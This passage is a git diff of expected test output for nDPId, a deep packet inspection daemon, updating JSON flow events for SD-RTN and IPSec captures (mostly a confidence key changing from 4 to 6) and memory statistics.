00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1649336965165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336965165,"pkt":"eJS0JASgYDjgxTWgCABFoAEGAFRAAD8RpDrAqAJkF\/i6tLq9H8IA8ukWAHKNlwAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARi0N1CFxirRT+Qnnrz\/pyBDu6aGfdoDtspPZ5eKK0FFQUQEAEFFU0dQVUJTQQAE3Cx8VYdzNil7sFRPDWbBkTVwDhDpZB0H1ndvXVYUqBYfSWs33e8hvSgcWboTgtdnoWm6BanWQW5l3Pfuz5zOwktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336965165,"flow_last_seen":1649336965165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336965165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336965165,"flow_last_seen":1649336965165,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336965165,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1649336965165,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336965165,"pkt":"eJS0JASgYDjgxTWgCABFoAEGAFVAAD8RpDnAqAJkF\/i6tLq9H8IA8ukWAHKNlwAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARi0N1CFxirRT+Qnnrz\/pyBDu6aGfdoDtspPZ5eKK0FFQUQEAEFFU0dQVUJTQQAE3Cx8VYdzNil7sFRPDWbBkTVwDhDpZB0H1ndvXVYUqBYfSWs33e8hvSgcWboTgtdnoWm6BanWQW5l3Pfuz5zOwktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1649336965166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336965166,"pkt":"eJS0JASgYDjgxTWgCABFoAEGAFZAAD8RpDjAqAJkF\/i6tLq9H8IA8ukWAHKNlwAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTgwLmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARi0N1CFxirRT+Qnnrz\/pyBDu6aGfdoDtspPZ5eKK0FFQUQEAEFFU0dQVUJTQQAE3Cx8VYdzNil7sFRPDWbBkTVwDhDpZB0H1ndvXVYUqBYfSWs33e8hvSgcWboTgtdnoWm6BanWQW5l3Pfuz5zOwktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":401,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":401,"packets-processed":400,"total-skipped-flows":0,"total-l4-payload-len":94737,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":1,"current-active-flows":8,"total-active-flows":26,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":155,"global_ts_msec":1649337802272} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":498,"flow_tot_l4_payload_len":4167,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1649336897978,"flow_last_seen":1649337802273,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":4212,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336965165,"flow_last_seen":1649336968493,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":3510,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336960165,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3290,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336894950,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":3525,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336954948,"flow_last_seen":1649336955151,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3288,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336870173,"flow_last_seen":1649336870432,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3490,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336879948,"flow_last_seen":1649336882923,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":4284,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1649336960225,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":498,"flow_tot_l4_payload_len":4167,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55094,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1649336897978,"flow_last_seen":1649337802273,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":4212,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"199.190.44.135","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336965165,"flow_last_seen":1649336968493,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":3510,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336960165,"flow_last_seen":1649336960225,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3290,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336894950,"flow_last_seen":1649336897978,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":3525,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336954948,"flow_last_seen":1649336955151,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3288,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336870173,"flow_last_seen":1649336870432,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3490,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649336879948,"flow_last_seen":1649336882923,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":4284,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1649337802273,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":403,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":403,"packets-processed":403,"total-skipped-flows":0,"total-l4-payload-len":95439,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":26,"total-detection-updates":0,"total-updates":1,"current-active-flows":0,"total-active-flows":26,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":164,"global_ts_msec":1649337802273} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 403/403 @@ -170,9 +170,9 @@ ~~ total active/idle flows...: 26/26 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5907630 bytes -~~ total memory freed........: 5907630 bytes -~~ total allocations/frees...: 118617/118617 +~~ total memory allocated....: 6041264 bytes +~~ total memory freed........: 6041264 bytes +~~ total allocations/frees...: 121379/121379 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 768 chars diff --git a/test/results/ah.pcapng.out b/test/results/ah.pcapng.out index ea0603252..fbe8db828 100644 --- a/test/results/ah.pcapng.out +++ b/test/results/ah.pcapng.out @@ -2,15 +2,15 @@ 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1587338929051} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338929051,"flow_last_seen":1587338929051,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587338929051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1587338929051,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587338929051,"pkt":"qrvMAAMQqrvMAAIQCABFwAGCAJ4AAP8RngIKAgMCCgMEBAH0AfQBbieYHBhp9tKboMwAAAAAAAAAACEgIggAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAAop90y3jHmNMWVGIbNRerOVFzMP5JoRLlIVT+uGcaHcUDAfZ9agub4v3ifShq9iAjKtd\/XZoIX76e0SSPXecxSXzgS1HJOpsJtzfXg96dFLBFkvBpXPHiUb1T29i2BXzdKwAAJGy943MOgVw+17TTE3RGnNSeH1Br3ZzttJxYzZbae2KMKwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABCNvuAsA4SMheroNDIs0se1c2REJAAAAHAAAQAUSA9ZB8IS5r14gXhydhU2hTnWD2w=="} -00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338929051,"flow_last_seen":1587338929051,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587338929051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338929051,"flow_last_seen":1587338929051,"flow_idle_time":200000,"flow_min_l4_payload_len":358,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":358,"midstream":0,"thread_ts_msec":1587338929051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00912{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587338929058,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":400,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":400,"pkt_l4_len":366,"thread_ts_msec":1587338929058,"pkt":"qrvMAAIQqrvMAAMQCABFwAGCAJUAAP4RnwsKAwQECgIDAgH0AfQBbpMTHBhp9tKboMxXKornVXrZ7CEgIiAAAAAAAAABZiIAADAAAAAsAQEABAMAAAwBAAAMgA4BAAMAAAgCAAAGAwAACAMAAA0AAAAIBAAAFCgAAGgAFAAA3\/NdSHtjsuV9lwu7r3PG72M7PTs97w7W7XWrjiKy83GusQxHzpqo7SyUw6CdLyZlI6GlvRXFFZQ37DazOAEOXk0lG8t6jBRQFWWSD0tGhA1+E9jC73KPJu4MHQQrp0dlKwAAJMsSzp7FMBmLLwjNerQt3fDJwl4MLQ75rKamBuCoU9JFKwAAF0NJU0NPLURFTEVURS1SRUFTT04rAAATQ0lTQ09WUE4tUkVWLTAyKwAAF0NJU0NPLURZTkFNSUMtUk9VVEUpAAAVRkxFWFZQTi1TVVBQT1JURUQpAAAcAABABLSbKQHg76sTvA2s+iqtHO17zN+1AAAAHAAAQAXEF0AGtBGCSamsYpymSQTNLPEeng=="} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1587338929067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1587338929067,"pkt":"qrvMAAMQqrvMAAIQCABFwAFkAJ8AAP8Rnh8KAgMCCgMEBAH0AfQBUGzjHBhp9tKboMxXKornVXrZ7C4gIwgAAAABAAABSCsAASyBDTrs2Pxvpq7JTnlskHs3y\/lcA4L2kN8fdzJ8fVpYrZTlpuZPtrueSIpYdb+qQTDV2NvMTrxEqmRiytNcmsMUgiqFEXykJmS3P10k8AYBydJ7jb5c3eyLXb1Xq+36+2tgOS1TpUTMh9FvAJkjDZuy9dxuXzbWMy9Bia4cikOr17km8gYu1TAmwh\/g9n514pWnNcM6640AaIdVe6A4QpHHMQEvu1nLtY9OQj13tjKJXcfVHJL\/tVSVAMUi+K5X3aJOMKyYeZBbVZrNRi8RFtvjXQRLRPFCTuUeShJfFRDznRua5syxQXi+6dd5t3q5F806SIRRAk975bBTw\/\/FxVkvix8dHReWdnoNuDuSDSHK8wVobcjOktkOzVZUVL8vxTTf4rHWn7VO+g=="} 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"flow_datalink":1,"flow_max_packets":3} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587338931051,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587338931051,"pkt":"qrvMAAMQqrvMAAIQCABFAAB8ABMAAP8zoDEKAgMCCgMEBAEEAABgSBb2AAAAAecyq6zhxgBG7sZB7QgAZwQABQABAAAAAAAUFyyrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} -00585{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00585{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587338931051,"flow_last_seen":1587338931051,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","l4_proto":51,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1587338931051,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587338931051,"pkt":"qrvMAAIQqrvMAAMQCABFAAB8ABMAAP4zoTEKAwQECgIDAgEEAACvhoPvAAAAAQLuLdf7aFTxy+gQnAAAbwQABQABAAAAAAAUFyyrzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavNq82rzavN"} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"ah.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1587338929051,"flow_last_seen":1587338929075,"flow_idle_time":200000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1587338931051,"l3_proto":"ip4","src_ip":"10.2.3.2","dst_ip":"10.3.4.4","src_port":500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 